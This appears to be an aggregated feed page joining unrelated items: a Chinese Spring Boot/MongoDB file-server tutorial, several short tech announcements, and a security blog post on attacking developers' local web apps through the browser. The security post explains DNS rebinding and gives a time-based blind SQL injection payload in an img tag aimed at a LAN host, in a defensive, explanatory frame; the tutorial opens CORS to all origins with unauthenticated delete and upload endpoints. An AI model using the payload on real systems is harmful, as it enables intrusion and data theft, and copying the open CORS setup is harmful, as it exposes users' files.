          本文不会对 MongoDB 的概念、基本用法做过多的介绍,有兴趣的朋友可自行查阅其他文献,比如,笔者所著的《分布式系统常用技术及案例分析》一书,对 MongoDB 方面也有所着墨。

          所需环境

          本例子采用的开发环境如下:

          • MongoDB 3.4.4
          • Spring Boot 1.5.3.RELEASE
          • Thymeleaf 3.0.3.RELEASE
          • Thymeleaf Layout Dialect 2.2.0
          • Embedded MongoDB 2.0.0
          • Gradle 3.5

          其中,Spring Boot 用于快速构建一个可独立运行的 Java 项目;Thymeleaf 作为前端页面模板,方便展示数据;Embedded MongoDB 则是一款由 Organization Flapdoodle OSS 出品的内嵌 MongoDB,可以在不启动 MongoDB 服务器的前提下,方面进行相关的 MongoDB 接口测试;Gradle 是一个类似于 Apache Maven 概念的新一代项目自动化构建工具。

          有关 Spring Boot 的方面的内容,可以参阅笔者所著著的开源书《Spring Boot 教程》。有关 Thymeleaf 的方面的内容,可以参阅笔者所著著的开源书《Thymeleaf 教程》。有关 Gradle 的方面的内容,可以参阅笔者所著著的开源书《Gradle 3 用户指南》。

          build.gradle

          本文所演示的项目,是采用 Gradle 进行组织以及构建的,如果您对 Gradle 不熟悉,也可以自行将项目转为 Maven 项目。

          build.gradle 文件内容如下:

          // buildscript 代码块中脚本优先执行
          buildscript {
          
          	// ext 用于定义动态属性
          	ext {
          		springBootVersion = '1.5.3.RELEASE'
          	}
          			
          	// 自定义  Thymeleaf 和 Thymeleaf Layout Dialect 的版本
          	ext['thymeleaf.version'] = '3.0.3.RELEASE'
          	ext['thymeleaf-layout-dialect.version'] = '2.2.0'
          	// 自定义 Embedded MongoDB 的 依赖
          	ext['embedded-mongo.version'] = '2.0.0'
          
          	// 使用了 Maven 的中央仓库(你也可以指定其他仓库)
          	repositories {
          		//mavenCentral()
          		maven {
          			url 'http://maven.aliyun.com/nexus/content/groups/public/'
          		}
          	}
          	
          	// 依赖关系
          	dependencies {
          		// classpath 声明说明了在执行其余的脚本时,ClassLoader 可以使用这些依赖项
          		classpath("org.springframework.boot:spring-boot-gradle-plugin:${springBootVersion}")
          	}
          }
          
          // 使用插件
          apply plugin: 'java'
          apply plugin: 'eclipse'
          apply plugin: 'org.springframework.boot'
          
          // 打包的类型为 jar,并指定了版本
          version = '1.0.0'
          
          // 指定编译 .java 文件的 JDK 版本
          sourceCompatibility = 1.8
          
          // 默认使用了 Maven 的中央仓库。这里改用自定义的镜像库
          repositories {
          	//mavenCentral()
          	maven {
          		url 'http://maven.aliyun.com/nexus/content/groups/public/'
          	}
          }
          
          // 依赖关系
          dependencies {
          	// 该依赖对于编译发行是必须的
          	compile('org.springframework.boot:spring-boot-starter-web')
           
          	// 添加 Thymeleaf 的依赖
          	compile('org.springframework.boot:spring-boot-starter-thymeleaf')
          
          	// 添加 Spring Data Mongodb 的依赖
          	compile 'org.springframework.boot:spring-boot-starter-data-mongodb'
          	
          	// 添加  Embedded MongoDB 的依赖用于测试
          	compile('de.flapdoodle.embed:de.flapdoodle.embed.mongo')
          
          	// 该依赖对于编译测试是必须的,默认包含编译产品依赖和编译时依
          	testCompile('org.springframework.boot:spring-boot-starter-test')
          }
          
          

          该 build.gradle 文件中的各配置项的注释已经非常详尽了,这里就不再赘述其配置项的含义了。

          领域对象

          文档类 File

          文档类是类似与 JPA 中的实体的概念。

          import org.springframework.data.mongodb.core.mapping.Document;
          
          @Document
          public class File {
          	@Id  // 主键
          	private String id;
              private String name; // 文件名称
              private String contentType; // 文件类型
              private long size;
              private Date uploadDate;
              private String md5;
              private byte[] content; // 文件内容
              private String path; // 文件路径
              
              ...
          	// getter/setter 
              ...
              
              protected File() {
              }
              
              public File(String name, String contentType, long size,byte[] content) {
              	this.name = name;
              	this.contentType = contentType;
              	this.size = size;
              	this.uploadDate = new Date();
              	this.content = content;
              }
             
              @Override
              public boolean equals(Object object) {
                  if (this == object) {
                      return true;
                  }
                  if (object == null || getClass() != object.getClass()) {
                      return false;
                  }
                  File fileInfo = (File) object;
                  return java.util.Objects.equals(size, fileInfo.size)
                          && java.util.Objects.equals(name, fileInfo.name)
                          && java.util.Objects.equals(contentType, fileInfo.contentType)
                          && java.util.Objects.equals(uploadDate, fileInfo.uploadDate)
                          && java.util.Objects.equals(md5, fileInfo.md5)
                          && java.util.Objects.equals(id, fileInfo.id);
              }
          
              @Override
              public int hashCode() {
                  return java.util.Objects.hash(name, contentType, size, uploadDate, md5, id);
              }
          
              @Override
              public String toString() {
                  return "File{"
                          + "name='" + name + '\''
                          + ", contentType='" + contentType + '\''
                          + ", size=" + size
                          + ", uploadDate=" + uploadDate
                          + ", md5='" + md5 + '\''
                          + ", id='" + id + '\''
                          + '}';
              }
          }
          

          文档类,主要采用的是 Spring Data MongoDB 中的注解,用于标识这是个 NoSQL 中的文档概念。

          存储库 FileRepository

          存储库用于提供与数据库打交道的常用的数据访问接口。其中 FileRepository 接口继承自org.springframework.data.mongodb.repository.MongoRepository即可,无需自行实现该接口的功能, Spring Data MongoDB 会自动实现接口中的方法。

          import org.springframework.data.mongodb.repository.MongoRepository;
          import com.waylau.spring.boot.fileserver.domain.File;
          
          public interface FileRepository extends MongoRepository<File, String> {
          }
          
          

          服务接口及实现类

          FileService 接口定义了对于文件的 CURD 操作,其中查询文件接口是采用的分页处理,以有效提高查询性能。

          public interface FileService {
          	/**
          	 * 保存文件
          	 * @param File
          	 * @return
          	 */
          	File saveFile(File file);
          	
          	/**
          	 * 删除文件
          	 * @param File
          	 * @return
          	 */
          	void removeFile(String id);
          	
          	/**
          	 * 根据id获取文件
          	 * @param File
          	 * @return
          	 */
          	File getFileById(String id);
          
          	/**
          	 * 分页查询,按上传时间降序
          	 * @param pageIndex
          	 * @param pageSize
          	 * @return
          	 */
          	List<File> listFilesByPage(int pageIndex, int pageSize);
          }
          

          FileServiceImpl 实现了 FileService 中所有的接口。

          @Service
          public class FileServiceImpl implements FileService {
          	
          	@Autowired
          	public FileRepository fileRepository;
          
          	@Override
          	public File saveFile(File file) {
          		return fileRepository.save(file);
          	}
          
          	@Override
          	public void removeFile(String id) {
          		fileRepository.delete(id);
          	}
          
          	@Override
          	public File getFileById(String id) {
          		return fileRepository.findOne(id);
          	}
          
          	@Override
          	public List<File> listFilesByPage(int pageIndex, int pageSize) {
          		Page<File> page = null;
          		List<File> list = null;
          		
          		Sort sort = new Sort(Direction.DESC,"uploadDate"); 
          		Pageable pageable = new PageRequest(pageIndex, pageSize, sort);
          		
          		page = fileRepository.findAll(pageable);
          		list = page.getContent();
          		return list;
          	}
          }
          

          控制层/API 资源层

          FileController 控制器作为 API 的提供者,接收用户的请求及响应。API 的定义符合 RESTful 的风格。有关 REST 相关的知识,读者可以参阅笔者所著的开源书《[REST 实战]》(https://github.com/waylau/rest-in-action)。

          @CrossOrigin(origins = "*", maxAge = 3600)  // 允许所有域名访问
          @Controller
          public class FileController {
          
              @Autowired
              private FileService fileService;
              
              @Value("${server.address}")
              private String serverAddress;
              
              @Value("${server.port}")
              private String serverPort;
              
              @RequestMapping(value = "/")
              public String index(Model model) {
              	// 展示最新二十条数据
                  model.addAttribute("files", fileService.listFilesByPage(0,20)); 
                  return "index";
              }
          
              /**
               * 分页查询文件
               * @param pageIndex
               * @param pageSize
               * @return
               */
          	@GetMapping("files/{pageIndex}/{pageSize}")
              @ResponseBody
          	public List<File> listFilesByPage(@PathVariable int pageIndex, @PathVariable int pageSize){
          		return fileService.listFilesByPage(pageIndex, pageSize);
          	}
          			
              /**
               * 获取文件片信息
               * @param id
               * @return
               */
              @GetMapping("files/{id}")
              @ResponseBody
              public ResponseEntity<Object> serveFile(@PathVariable String id) {
          
                  File file = fileService.getFileById(id);
          
                  if (file != null) {
                      return ResponseEntity
                              .ok()
                              .header(HttpHeaders.CONTENT_DISPOSITION, "attachment; fileName=\"" + file.getName() + "\"")
                              .header(HttpHeaders.CONTENT_TYPE, "application/octet-stream" )
                              .header(HttpHeaders.CONTENT_LENGTH, file.getSize()+"")
                              .header("Connection",  "close") 
                              .body( file.getContent());
                  } else {
                      return ResponseEntity.status(HttpStatus.NOT_FOUND).body("File was not fount");
                  }
          
              }
              
              /**
               * 在线显示文件
               * @param id
               * @return
               */
              @GetMapping("/view/{id}")
              @ResponseBody
              public ResponseEntity<Object> serveFileOnline(@PathVariable String id) {
          
                  File file = fileService.getFileById(id);
          
                  if (file != null) {
                      return ResponseEntity
                              .ok()
                              .header(HttpHeaders.CONTENT_DISPOSITION, "fileName=\"" + file.getName() + "\"")
                              .header(HttpHeaders.CONTENT_TYPE, file.getContentType() )
                              .header(HttpHeaders.CONTENT_LENGTH, file.getSize()+"")
                              .header("Connection",  "close") 
                              .body( file.getContent());
                  } else {
                      return ResponseEntity.status(HttpStatus.NOT_FOUND).body("File was not fount");
                  }
          
              }
              
              /**
               * 上传
               * @param file
               * @param redirectAttributes
               * @return
               */
              @PostMapping("/")
              public String handleFileUpload(@RequestParam("file") MultipartFile file,
                                             RedirectAttributes redirectAttributes) {
          
                  try {
                  	File f = new File(file.getOriginalFilename(),  file.getContentType(), file.getSize(), file.getBytes());
                  	f.setMd5( MD5Util.getMD5(file.getInputStream()) );
                  	fileService.saveFile(f);
                  } catch (IOException | NoSuchAlgorithmException ex) {
                      ex.printStackTrace();
                      redirectAttributes.addFlashAttribute("message",
                              "Your " + file.getOriginalFilename() + " is wrong!");
                      return "redirect:/";
                  }
          
                  redirectAttributes.addFlashAttribute("message",
                          "You successfully uploaded " + file.getOriginalFilename() + "!");
          
                  return "redirect:/";
              }
           
              /**
               * 上传接口
               * @param file
               * @return
               */
              @PostMapping("/upload")
              @ResponseBody
              public ResponseEntity<String> handleFileUpload(@RequestParam("file") MultipartFile file) {
              	File returnFile = null;
                  try {
                  	File f = new File(file.getOriginalFilename(),  file.getContentType(), file.getSize(),file.getBytes());
                  	f.setMd5( MD5Util.getMD5(file.getInputStream()) );
                  	returnFile = fileService.saveFile(f);
                  	String path = "//"+ serverAddress + ":" + serverPort + "/view/"+returnFile.getId();
                  	return ResponseEntity.status(HttpStatus.OK).body(path);
           
                  } catch (IOException | NoSuchAlgorithmException ex) {
                      ex.printStackTrace();
                      return ResponseEntity.status(HttpStatus.INTERNAL_SERVER_ERROR).body(ex.getMessage());
                  }
           
              }
              
          	/**
               * 删除文件
               * @param id
               * @return
               */
              @DeleteMapping("/{id}")
              @ResponseBody
              public ResponseEntity<String> deleteFile(@PathVariable String id) {
           
              	try {
          			fileService.removeFile(id);
          			return ResponseEntity.status(HttpStatus.OK).body("DELETE Success!");
          		} catch (Exception e) {
          			return ResponseEntity.status(HttpStatus.INTERNAL_SERVER_ERROR).body(e.getMessage());
          		}
              }
          }
          

          其中@CrossOrigin(origins = "*", maxAge = 3600) 注解标识了 API 可以被跨域请求。为了能够启用该注解,仍然需要安全配置类的支持。

          安全配置

          为了支持跨域请求,我们设置了安全配置类 SecurityConfig:

          @Configuration
          @EnableWebMvc
          public class SecurityConfig extends WebMvcConfigurerAdapter {
          
          	@Override
          	public void addCorsMappings(CorsRegistry registry) {
          		registry.addMapping("/**").allowedOrigins("*") ; // 允许跨域请求
          	}
          }
          

          运行

          有多种方式可以运行 Gradle 的 Java 项目。使用 Spring Boot Gradle Plugin 插件运行是较为简便的一种方式,只需要执行:

          $ gradlew bootRun
          

          其他运行方式,请参阅笔者的开源书《Spring Boot 教程》

          项目成功运行后,通过浏览器访问 http://localhost:8081 即可。首页提供了上传的演示界面,上传后,就能看到上传文件的详细信息:

          相关上传的接口暴露在了 http://localhost:8081/ ,其中

          • GET /files/{pageIndex}/{pageSize} : 分页查询已经上传了的文件
          • GET /files/{id} : 下载某个文件
          • GET /view/{id} : 在线预览某个文件。比如,显示图片
          • POST /upload : 上传文件
          • DELETE /{id} : 删除文件

          源码

          MongoDB File Server 是一款开源的产品,完整的项目源码见 https://github.com/waylau/mongodb-file-server。

          参考文献


                    Hosting a NodeJs Express Application on Amazon Web Services (EC2)        

          Updated 2014-09-23 - NVM and Ubuntu 14.04 notes

          For the past year or so I've been super intrigued by NodeJs. It's a very cool stack, and the thought of building an entire application (front and back) with Javascript certainly merits some attention. Add MongoDb (a javascript based, document database)


                    How to connect MongoDB to any BI or ODBC application        

          In this video, Magnitude’s engineer Jeff Bayntun will show you how to connect MongoDB to …

          The post How to connect MongoDB to any BI or ODBC application appeared first on Simba Technologies.


                    Pentaho 5.1 supporte nativement MongoDB et Yarn        
          Pentaho annonce la disponibilité de la version 5.1 de sa plateforme analytique et d’intégration de données.
                    Comment créer une carte interactive des résultats électoraux avec Excel et CartoDB        

          Ce tutoriel est tiré d’une présentation que j’ai faite pour un Meetup de Hacks/Hackers Montréal. Devenez membre si vous habitez dans la région! Je vous montre ici comment utiliser les données de l’élection générale canadienne de 2011 pour réaliser une carte interactive avec CartoDB. CartoDB est un outil formidable qui, en plus de permettre la création de très belles […]

          Cet article Comment créer une carte interactive des résultats électoraux avec
          Excel et CartoDB
          est apparu en premier sur Nael Shiab.


                    First Open Chemistry Beta Release        

          Open Chemistry

          We are pleased to announce the first beta release of the Open Chemistry suite of cross platform, open-source, BSD-licensed tools and libraries - Avogadro 2, MoleQueue and MongoChem. They are being released in beta, before all planned features are complete, to get feedback from the community following the open-source mantra of “release early, release often”. We will be making regular releases over the coming months, as well as automatically generating nightly binaries. A Source article from 2011 introduced the project, slides from FOSDEM describe it more recently, and the 0.5.0 release binaries can be downloaded here.

          Open Chemistry workflow

          These three desktop applications can each be used independently, but also have the capability of working together. Avogadro 2 is a rewrite of Avogadro that addresses many of the limitations we saw. This includes things such as the rendering code, scalability, scriptability, and increased flexibility, enabling us to effectively address the current and upcoming challenges in computational chemistry and related fields. MoleQueue provides desktop services for executing standalone programs both locally and on remote batch schedulers, such as Sun Grid Engine, PBS and SLURM. MongoChem provides chemically-aware search, storage, and informatics visualization using MongoDB and VTK.

          Open Chemistry library organization

          Avogadro 2

          Avogadro 2 is a rewrite of Avogadro; please see the recently-published paper for more details on Avogadro 1. Avogadro has been very successful over the years, and we would like to thank all of our contributors and supporters, including the core development team: Geoff Hutchison, Donald Curtis, David Lonie, Tim Vandermeersch, Benoit Jacob, Carsten Niehaus, and Marcus Hanwell. We also recently obtained permission from almost all authors to relicense the existing code under the 3-clause BSD license, which will make migration of code to the new architecture much easier.

          Avogadro 2 rendering a molecular orbital

          Some notable new features of Avogadro 2 include:

          • Scalable data structures capable of addressing the needs of large molecular systems.
          • A flexible file I/O API supporting seamless addition of formats at runtime.
          • A Python-based input generator API, creating an input for a range of quantum codes.
          • A specialized scene graph for supporting scalable molecular rendering.
          • OpenGL 2.1/GLSL based rendering, employing point sprites, VBOs, etc.
          • Unit tests for core classes, with ongoing work to improve coverage.
          • Binary installers generated nightly.
          • Use of MoleQueue to run computational codes such as NWChem, MOPAC, GAMESS, etc.

          Avogadro is not yet feature complete, but we invite you to try it out along with the suite of applications as we continue to improve it. The new Avogadro libraries feature much finer granularity; whereas before we provided a single library with all API, there is now a layered API in multiple libraries. The Core and IO libraries have minimal dependencies, with the rendering library adding a dependence on OpenGL, and the Qt libraries adding Qt 4 dependencies. This allows us to reuse the code in many more places than was possible before, with rendering possible on a server without Qt/X, and the Core/IO libraries being suitable for command line use or integration into non-graphical applications.

          MoleQueue

          MoleQueue is a new application developed to satisfy the need to execute computational chemistry codes locally and remotely. Rather than adding this functionality directory to Avogadro 2, it has been developed as a standalone system-tray resident application that runs a graphical application and a local server (using local sockets for communication). It supports the configuration of multiple queues (local and remote), each containing one-or-more programs to be executed. Applications communicate with MoleQueue using JSON-RPC 2.0 over a local socket, and receive updates as the job state changes. A recent Source article describes MoleQueue in more detail.

          MoleQueue queue configuration

          In addition to the system-tray resident application, MoleQueue provides a Qt 4-based client library that can easily be integrated into Qt applications, providing a familiar signal-slot based API for job submission, monitoring, and retrieval. The project has remained general in its approach, containing no chemistry specific API, and has already been used by several other projects at Kitware in different application domains. Communicating with the MoleQueue server from other languages is quite simple, with the client code having minimal requirements for connecting to a named local socket and constructing JSON strings conforming to the JSON-RPC 2.0 specification.

          MongoChem

          MongoChem is another new application developed as part of the Open Chemistry suite of tools, leveraging MongoDB, VTK, and AvogadroLibs to provide chemical informatics on the desktop. It seeks to address the need for researchers and groups to be able to effectively store, index, search and retrieve relevant chemical data. It supports the use of a central database server where all data can be housed, and enables the significant feature set of MongoDB to be leveraged, such as sharding, replication and efficient storage of large data files. We have been able to reuse several powerful cheminformatics libraries such as Open Babel and Chemkit to generate identifiers, molecular fingerprints and other artifacts as well as developing out features in the Avogadro libraries to support approaches to large datasets involving many files.

          MongoChem

          We have taken advantage of the charts developed in VTK and 2D chemical structure depiction in Open Babel to deliver immersive charts that are capable of displaying multiple dimensions of the data. Linked selection allows for selection in one view, such as parallel coordinate; views of that selection in a scatter plot matrix, and the table view. The detail dialog for a given molecule shows 2D structure depiction, an interactive 3D visualization when geometry is available and support for tagging and/or annotation. We have also developed an early preview of a web interface to the same data using ParaViewWeb, enabling you to share data more widely if desired. This also features a 3D interactive view using the ParaViewWeb image streaming technology which works in almost all modern browsers.

          Putting Them Together

          Each of the applications in the Open Chemistry suite listens for connections on a named local socket, and provides a simple JSON-RPC 2.0 based API. Avogadro 2 is capable of generating input files for several computational chemistry codes, including GAMESS and NWChem, and can use MoleQueue to execute these programs and keep track of the job states. Avogadro 2 can also query MongoChem for similar molecules to the one currently displayed, and see a listing sorted by similarity. MongoChem is capable of searching large collections of molecules, and can use the RPC API to open any selected molecule in the active Avogadro 2 session.

          Acknowledgements

          The development of the Open Chemistry workbench has been funded by a US Army SBIR with the Engineering Research Development Center under contract (W912HZ-12-C-0005) at Kitware, Inc.

          Originally published on the Kitware blog


                    Comment on MongoDb text search by Using mongodb text search with node.js | David's Tech Blog        
          […] my last post I talked about enabling mongodb’s beta text search, which at least to me was a little less […]
                    MongoDB使用PHP查找特定欄位是否存在        
          views: 14290 times
          由於 MongoDB 是一種 schema-free 的資料庫, 使用 Document 為基礎的存放方式, 所以若是想要查找特定欄位是否存在的語法就很重要了, 先來看看官方的資料:

          https://docs.mongodb.com/manual/reference/operator/query/exists/

          語法是使用 $exists 的方式來判定特定欄位是否存在, 若要轉為 php 語法的話, 可以使用如下:


          來列出在 collection 中 field1 不存在的資料, 這對於使用特定欄位做為處理資料或作業資料來說, 可以方便地判斷, 也不用預先開好欄位, 很方便實用的一個用法.



                    MongoDB 3.4 and “multimodel” query        
          “Multimodel” database management is a hot new concept these days, notwithstanding that it’s been around since at least the 1990s. My clients at MongoDB of course had to join the train as well, but they’ve taken a clear and interesting stance: A query layer with multiple ways to query and analyze data. A separate data […]
                    Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls        

          Software and web developers, owners of the latest IOT gadgets and people who just like to surf the web at home have one thing in common, they are all protected by a firewall.

          Businesses typically protect their networks with hardware, dedicated and robust firewalls, while home users usually have it built in their routers. Firewalls are essential for internet security, since they prevent anyone from the outside to access the internal network, and possibly sensitive data. However, firewalls are no panacea. In some cases, malicious hackers can still attack a vulnerable web application that is hosted behind a firewall.

          In this blog post, we will explain the different methods attackers can use to access vulnerable web applications behind firewalls, and we will also explain what countermeasures can be taken to thwart such attempts.

          Table of Content

          How many Developers are Vulnerable to These Type of Attacks?

          It is difficult to estimate how many web developers can be vulnerable to such type of attacks. Though we have run a survey with web developers and here are some interesting facts:

          • 81% of respondents run their software on a web server
          • 89% claimed they keep their web server software up to date
          • 52% say they run vulnerable/undeveloped web applications on their server
          • 55% are running web apps in development on servers directly connected to the internet
          • 32% admitted to hardening the web applications on their test environment

          According to the above statistics, 52% of web developers can be vulnerable to the type of attacks that documented in this article. That's quite a shocking statistic, but not a surprising one as Ferruh Mavituna explained when announcing the web developers survey results. An even more shocking fact is that 55% of the respondents admit that from time to time these web applications are running on computers which are connected directly to the internet. That's definitely something that businesses should tackle at the earliest possible.

          A Typical Web Application Developer’s Test Setup

          As a web application developer it is impossible to write code without having a proper testing environment. Fortunately, it is easy to install all the necessary pre-configured applications typically used for testing, so the majority of the developers run a web server on their machine.

          For windows, there are popular applications such as XAMPP, which installs Apache, MySQL and PHP, a common combination for web development. On Linux, this can be easily done by installing the needed packages using a package manager. Both methods have the advantage that Apache is preconfigured to a certain degree. Though in order to prevent the Apache web server from being publicly accessible, developers have to configure it to listen on 127.0.0T.1:80 instead of 0.0.0.0:80, or else use a firewall to block incoming connections. But is this enough to block incoming connections and possible malicious attacks in a testing environment?.

          Protected Test Web Server & Applications Are Still Vulnerable to Malicious Attacks

          Unfortunately many assume that the security measures mentioned above are enough to prevent anyone from sending requests to the web applications running on the test Apache web server. It is assumed that this form of Eggshell Security, hardened from the outside but vulnerable on the inside, allows them to run vulnerable test applications.

          People also often assume that they are safe, even if a vulnerable or compromised machine is in the same network as long as it does not contain personal data. However, it is still possible for an attacker to tamper with files or databases, some of which are typically later used in production environments. Attackers can also probe the internal network for weaknesses. In some cases, it is even possible to use methods like ARP-Spoofing to carry out Man-In-The-Middle (MITM) attacks.

          But how can an attacker gain access to the development environment, when it is correctly configured to only listen on the loopback interface? Or even better, it is not even accessible from the outside because of a firewall, or because it only allows whitelisted access from within the internal network? The answer is simple: Through the developer’s web browser.

          Attacking the Developer’s Vulnerable Test Setup Through the Web Browser

          Logo of Google Chrome Logo of Microsoft Edge Logo of Mozilla Firefox Logo of Safari

          Web browsers are considered to be the biggest attack surface on personal computers; their codebase and functionality is steadily growing and through the years there have been some notoriously insecure browsers and plugins.  Attackers also tend to target browsers due to shortcomings in the design of some modern protocols and standards. Most of them have been built with a good intention, but can also lead to serious vulnerabilities and easy exploitation cross domain. For example, in some cases it is even possible to use the victim’s browser as a proxy and tunnel web request through it.

          But new technologies are not the only problem with web browsers security. There are much older issues. For example one of the issues that has the biggest impact is the fact that every website is allowed to send data to any other accessible website. Contrary to popular belief, Same Origin Policy does not prevent the sending of data to a website. It only prevents browsers from retrieving the response. Therefore attacker.com can easily send requests to 127.0.0.1 and that is obviously a big problem.

          In this article, we are going to explain how malicious attackers can execute a number of browser based attacks to retrieve data from the victim’s computer, which could be sitting behind a firewall or any other type of protection.

          Vulnerable Test Websites on a Local Machine

          The problem with Vulnerable Test Environments

          http://localhost/

          Security researchers and developers typically run vulnerable applications on their machines. For example, developers typically have web applications that are still in development stage, and maybe the security mechanisms are not in place yet, such as the CSRF tokens or authentication.

          Security researchers have the same type of applications running on their computers. It is their job to find security issues so they are typically testing vulnerable web applications, which make them an easy target for these kinds of exploits.

          Since the Same Origin Policy (SOP) prevents the attacker from mapping the web application to search for vulnerabilities, he has two possibilities to attack the victim;

          1. Use a blind approach, during which the attacker has to brute force file and parameter names,
          2. Use a method with which he can actually view and explore the web application. This is where methods such as DNS rebinding come into play.

          DNS Rebinding Attack

          Image for a DNS Rebinding Attack

          This attack method is simple and allows attackers to easily retrieve information from the victim’s computer if it is running a webserver. During this attack the malicious hacker exploits the web browser’s DNS resolution mechanism to retrieve information from the /secret/ subdirectory on the server, as explained below:

          1. The attacker sets up a website on a live domain, for example, attacker.com that is hosted on the IP address 11.22.33.44.
          2. The attacker configures a very short DNS cache time (TTL, time to live) for the FQDN record.
          3. He serves a malicious script to the victim that when executed sends any data it finds back to the attacker controlled server every few minutes.
          4. The attacker changes the IP address of the FQDN attacker.com to 127.0.0.1.
          5. Since the TTL was set to a very short time, the browser tries to resolve the IP address of attacker.com again when executing the script that is trying to get the content from the /secret/ sub directory. This needs to be done with a delay of about one minute to let the browser's DNS cache expire.
          6. Since the script is now running and the IP address of attacker.com is now set to 127.0.0.1, the attacker’s script effectively queries the content of 127.0.0.1/secret instead of 11.22.33.44/secret, thus retrieving the data from the victim’s /secret/ sub directory.

          It is very difficult for the victim to identify this type of attack since the domain name is still attacker.com. And since the malicious script runs on the same domain, it also partially bypasses the Same Origin Policy.

          DNS Rebinding is a Preventable Attack

          DNS Rebinding attacks can be prevented at web server level. We will talk more about prevention at the end of this article, but here is a little overview; as a developer, you should use FQDNs on your local web server such as local.com and whitelist those host headers, so any HTTP requests that do not have the host header in them can be rejected.

          Shared hosting is prone to DNS Rebinding only to a certain degree. This is due to the fact that the web server determines which of the websites to server based on the host header. If the host header is not known to the web server it will return the default website. So in this scenario, only the default host is vulnerable to such attack.

          Same Origin Policy is not completely bypassed

          Since this is an entirely new domain that the user visited, and only the IP address matches, it is not possible for the attacker to steal session information. Cookies are tied to a specific hostname by the browser, not to an IP address. This means that a cookie for http://127.0.0.1 is not valid for http://attacker.com even though it points to 127.0.0.1.

          However, in many cases, a valid cookie is not needed, for example when a security researcher has a web application that is vulnerable to command injection vulnerability and no authentication is required. In such a case, the attacker can either use DNS rebinding or simple CSRF (once he knows the vulnerable file and parameter) to issue system commands.

          Do Not Run Unpatched Web Applications on Local Machines - It is Dangerous

          It is worth mentioning that there are many reasons why even non-developer users tend to have outdated software on the local network. It could be either because they forgot to update the software, or they do not know that an update is available. Many others do not update their software to avoid having possible compatibility issues.

          The method we will be describing now is convenient if there are known vulnerable web applications on the victim’s computer. We showed earlier how it is possible to identify and brute force WordPress instances in local networks using a technique called Cross Site History Manipulation, or XSHM. With XSHM it is possible to retrieve information about running applications and under some circumstances, one can even get feedback whether or not a CSRF attack has succeeded.

          This method is too evident to be used for brute force attacks or to scan local networks since it requires a refreshing window or redirects. However, it can be done stealthily for short checks since multiple redirects are not strange to modern websites. Legitimate reasons for those are oauth implementations or ad networks that redirect users to different domains.

          So it is possible to quickly identify which CMS or web application is running on a given host. If there are known vulnerabilities an attacker can use a known exploit and send the data back to himself, either by using javascript with DNS rebinding, Out Of Band methods, or other Same Origin Breaches.

          SQL injection Vulnerabilities on Your Local Network

          Image for SQL injection vulnerabilities.

          Imagine a Web Application is vulnerable to a SQL injection vulnerability in a SELECT statement that is only exploitable through a CSRF vulnerability, and the attacker knows that an ID parameter in the admin panel is vulnerable. The application runs with the least privileges needed to successfully retrieve data. An attacker cannot use an out of band method on MySQL without root privileges since stacked queries do not work in such setup. Also, the attacker cannot just insert an INSERT statement right behind the query.

          However, he can use the sleep command, which forces the SQL database to wait for a given amount of seconds before it continues to execute the query when combined with a condition. So for example, the attacker issues a command such as the following:

          if the first character of the admin password is “a” sleep for 2 seconds.

          If the request above takes less than two seconds to complete, then the first character in the password is not an “a”. The attacker tries the same with the letter “b”. If the request takes two seconds or longer to complete, then the first character of the password is “b”. The attacker can use this method to guess the remaining characters of the password.

          This type of attack is called time based blind SQL injection. However, in the above scenario, it does not seem like a useful attack because the attacker cannot issue the requests directly, but has to resort to CSRF. Also, the delay can only be detected in the user's browser with a different page loading time.

          Exploiting SQL injection Vulnerabilities Cross-Domain

          JavaScript can be used to determine whether a page finished loading or not by using the “onload” or the “onerror” event handler. Let’s say the attack is GET based (even though POST is also possible) and the vulnerable parameter is called ID. The attacker can:

          1. Record the time it takes for a page to load.

          2. Point an img tag to the vulnerable application, e.g.

          <img src = “http://192.168.1.123/admin.php?page=users&id=1+AND+IF+(SUBSTRING(DATABASE(),1,1)+=+'b',sleep(2),0)” onerror = “pageLoaded()”>

          3. Record the time after the page finishes loading with pageLoaded().

          4. Compare the values from step 1 and 3.

          If there are two or more seconds difference in loading time, it means that the attack was successful and the first letter of the database is a “b”. If not, the attacker proceeds with the letters “c”, “d”, “e” and so on until there is a measurable time delay. Due to this timing side channel it is possible to leak page loading times and therefore, in combination with an SQL injection, valuable data.

          Strong Passwords Are a Must, Even if The Web Application Is Not Public

          Image for a password.

          People tend to use weak passwords on web applications that are running on machines behind a firewall. Though that’s a wrong approach. Let’s say an attacker managed to compromise another computer in the same local network. If he notices a web application on another host he will try to brute-force the password for the admin panel. And if he guesses the credentials, since many modern web applications have upload functionality, the attacker can upload malicious files. Therefore an attacker is often able to plant a web shell on the server and issue commands on the machine hosting the web application.

          But as mentioned above there does not need to be a compromise prior to the brute forcing. With DNS rebinding it is still possible to brute force the web application from a malicious website with a low latency, since the web application already runs on localhost and the requests do not need to go over the web.

          Therefore it is important to always use strong passwords, no matter from where the application is accessible.

          Insecure phpMyAdmin Instances Can Be Dangerous

          Logo for phpMyAdmin, a very popular MySQL manager.

          phpMyAdmin, a very popular MySQL manager is often installed on developer’s machines, and unfortunately, most of them are not secure. For example, on some install scripts MySQL and phpMyAdmin do not use authentication or use a blank password by default. This means that it is very easy to exploit this through DNS rebinding as no prior knowledge of a password is required to issue MySQL commands.

          What makes phpMyAdmin especially dangerous is that it often runs with the highest possible privileges - as the MySQL root user. This means that once an attacker gains access to it, he can:

          • Extract data from all databases
          • Read Files
          • Write files

          In some configurations of MySQL, the file privileges are only allowed inside a specific directory. However, more often than not this security measure is not applied, especially in older versions. Therefore an attacker can read files and write attacker controlled content into the web root, which means he can plant a web shell, or a small script that allows him to issue system commands. Once he manages to do that most probably he will be able to escalate his privileges and place malware on the system or exfiltrate sensitive data.

          Typical Vulnerable Devices Found On a Network

          Routers Need To Be Kept Up To Date

          Web applications are not the only objects at risk on a network. Devices such as routers can also be targeted, mainly because they have a web interface which typically runs with root privileges. Routers tend to be a popular and easy target because:

          • Web interfaces are poorly coded.
          • They sometimes have backdoors or remote controlled interfaces with standard passwords that users never change.
          • Since storage space is often tight on routers, manufacturers often use old and probably vulnerable versions of a software, as long as it serves the purpose.

          In cases where routers’ admin web portal is not available from the outside, attackers can use DNS rebinding to log into the routers and hijack them. Such type of attacks are possible though they are not scalable, like the 2016 MIRAI malware infection. It infected thousands of home routers by using the default telnet password to gain admin access on the routers and add them to large botnets. Routers are typically hacked for a number of reasons, here are just a few:

          1. They can be used for Distributed Denial of Service (DDoS) attacks.
          2. Attackers can use them in a Man In The Middle attack (MITM) to intercept the traffic that passes through them.
          3. Attackers use them as a foothold to gain access to other machines on the router’s network, like what happened in the NotPetya ransomware in June 2017.

